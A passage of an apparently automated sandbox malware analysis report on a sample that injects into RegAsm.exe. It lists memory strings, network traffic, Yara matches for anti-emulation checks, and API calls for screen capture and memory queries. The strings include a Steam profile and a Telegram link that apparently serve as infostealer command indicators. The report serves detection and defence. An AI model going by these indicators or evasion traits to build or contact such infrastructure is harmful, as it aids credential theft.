                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.j
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: JEGHDA.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: IIDHJD.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.co
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/badges
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199686524322/inventory/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: GCBFBG.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: GDAAKF.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/k0mono
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: JEGHDA.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: JEGHDA.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                  Source: GCBFBG.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004112FD _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B8C0 rand_s,NtQueryVirtualMemory,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F736A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C07A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041BB29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CCA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C35A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C705C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73AC00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C706CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EED10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C700DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C736E63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C703E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E9E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C712E4E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C729E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C707E10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CBEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DFEF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C724EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E5E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D9F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CDFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F6FF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E8850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED850
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70B820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C714820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D7810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7058E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71B970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DD960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EA940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FD9B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C722990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C709A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E1AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C708AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C732AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F4AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DCAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73BA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D5440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73545C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73542B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CD4E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D64C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7234A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72C4A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F0512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7285F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CC670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E4640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C715600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7376E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72E680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C707710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7177A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70F070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7350C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C705190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70E2F0
